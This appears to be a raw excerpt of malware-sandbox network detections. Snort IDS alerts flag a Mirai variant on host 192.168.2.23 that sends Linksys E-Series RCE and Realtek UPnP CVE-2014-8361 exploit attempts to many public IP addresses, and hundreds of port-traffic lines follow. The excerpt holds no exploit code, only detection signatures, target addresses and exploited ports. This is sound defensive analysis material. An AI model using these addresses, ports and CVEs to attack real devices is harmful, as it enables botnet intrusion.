        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53936 -> 95.216.36.213:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53328 -> 95.100.205.70:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53358 -> 95.101.45.155:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52292 -> 95.179.247.159:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35434 -> 95.101.243.199:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52978 -> 95.214.135.177:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47524 -> 95.90.162.183:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44624 -> 95.140.158.56:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:57214 -> 172.65.84.37:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37110 -> 172.65.103.53:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:43894 -> 172.65.153.173:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46180 -> 88.83.108.149:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40424 -> 95.57.97.68:80
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44194 -> 156.226.87.89:52869
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34042 -> 156.232.88.71:52869
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39706 -> 172.65.220.230:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59304 -> 172.81.184.184:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35962 -> 88.49.177.249:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58002 -> 95.110.219.252:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48500 -> 95.217.81.204:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47996 -> 95.216.222.10:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44942 -> 95.217.212.150:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54506 -> 95.179.234.37:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58038 -> 95.100.6.218:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59042 -> 95.213.221.72:80
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51136 -> 156.245.58.191:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36432 -> 95.137.248.145:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:51198 -> 172.65.96.43:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52368 -> 172.65.117.69:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56852 -> 172.65.62.179:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56110 -> 95.58.76.92:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34184 -> 172.65.167.204:55555
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37370 -> 156.254.110.82:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34318 -> 88.193.167.167:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53336 -> 88.249.29.119:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59344 -> 88.210.164.58:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48866 -> 95.223.112.70:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44534 -> 95.100.82.234:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51742 -> 95.211.210.53:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42846 -> 95.101.190.177:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48254 -> 95.168.228.205:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51080 -> 95.140.37.166:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50534 -> 95.183.206.2:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45134 -> 95.216.233.126:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41112 -> 95.100.227.170:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40992 -> 95.58.74.10:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59636 -> 95.101.50.161:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43134 -> 95.101.46.195:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53942 -> 95.9.125.143:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47450 -> 95.80.201.238:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50124 -> 95.217.158.131:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33726 -> 95.181.133.202:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52884 -> 95.215.156.67:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51242 -> 95.179.143.203:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35232 -> 95.216.24.121:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48630 -> 95.101.46.190:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55016 -> 95.211.206.80:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56864 -> 95.164.217.32:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60076 -> 95.141.200.194:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40294 -> 95.164.211.137:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60124 -> 95.58.79.125:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43126 -> 95.154.112.122:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53800 -> 95.100.125.88:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53258 -> 95.179.219.137:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51574 -> 95.142.10.212:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52484 -> 95.57.130.228:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56040 -> 95.140.153.158:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47784 -> 95.101.179.121:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51322 -> 95.211.229.207:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46656 -> 95.131.158.159:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56656 -> 95.70.197.198:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41268 -> 95.65.49.53:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53014 -> 95.38.149.76:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36880 -> 95.90.154.229:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57140 -> 95.217.202.218:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41662 -> 95.217.235.136:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47216 -> 95.217.237.97:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59550 -> 95.216.165.118:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57352 -> 95.164.218.83:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41138 -> 95.217.114.199:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44390 -> 95.57.255.132:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52578 -> 95.111.197.188:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44342 -> 95.100.51.213:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39330 -> 95.80.200.201:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34744 -> 95.179.136.29:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46514 -> 95.101.44.240:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49448 -> 95.216.174.179:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50622 -> 95.100.6.166:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45390 -> 95.216.136.105:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45128 -> 95.163.12.168:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44078 -> 95.100.32.178:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44040 -> 95.100.32.178:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35064 -> 88.99.143.55:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57996 -> 88.150.159.106:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50622 -> 95.57.36.245:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60900 -> 95.30.250.186:80
        Source: global trafficTCP traffic: 197.4.60.165 ports 1,2,3,5,7,37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43430 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 37452 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 40306 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59744 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 53118 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 46802 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 54364 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 40306
        Source: unknownNetwork traffic detected: HTTP traffic on port 55878 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 54234 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 46486 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 44132 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 47106 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 46486
        Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 54234 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 54234 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 38390 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45748 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45898 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 38390 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 54234 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 38390 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 35320 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 35834 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45748 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45898 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 38390 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45748 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45898 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45748 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45898 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33988 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 48884 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 38076 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 52070 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 58940 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 54786 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33580 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33580 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33580 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45748 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 34822 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 56924 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 56924 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45898 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 56924 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33580 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 56924 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 35642 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 56572 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 34288 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 39336 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 39658 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 41018 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 33946 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 41308 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 40976 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 40976 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33580 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 40976 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 44980 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33828 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 46236 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 48576 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 53968 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45748 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45898 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 40976 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 47334 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55574 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 46958 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 37024 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 47334 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 57702 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 47334 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 37024 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 57702 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 46958 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 47334 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 53716 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33478 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 41954 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 59972 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 37024 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 44536 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 59972 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 57702 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 59972 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 46958 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 44536 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 40976 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 43450 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 43450
        Source: unknownNetwork traffic detected: HTTP traffic on port 37024 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 39546 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 38124 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 42204 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 59972 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 44536 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 57702 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 46510 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 42268 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 36862 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 48256 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33580 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 36862
        Source: unknownNetwork traffic detected: HTTP traffic on port 46510 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 53788 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 46510 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 48256 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55186 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 47160 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 42906 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 44536 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 46958 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 53788 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 46510 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 48256 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 53788 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 37024 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 42268 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 60922 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 48256 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 60922 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 37608 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 60922 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55310 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 57702 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 53788 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 44536 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55310 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 37608 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 60922 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 37380 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 60828 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 40976 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55310 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 37608 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 46958 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 33824 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 48256 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55310 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 60798 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 42268 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 51218 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 33824 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 37608 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 45748 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 53788 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 51218 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 56372 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33824 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 51218 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 45898 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 37024 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55310 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 39434 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 53492 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33886 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33430 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 34734 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 54408 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 34734
        Source: unknownNetwork traffic detected: HTTP traffic on port 34088 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 51982 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 51218 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 35140 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 53688 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 44870 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 44536 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 45400 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 34088 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 39434 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 33824 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 37608 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 57702 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 34088 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 36554 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 57596 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50844 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 50844
        Source: unknownNetwork traffic detected: HTTP traffic on port 36828 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 39434 -> 52869
        Source: unknownNetwork traffic detected: HTTP traffic on port 48256 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 55555
        Source: unknownNetwork traffic detected: HTTP traffic on port 33580 -> 55555
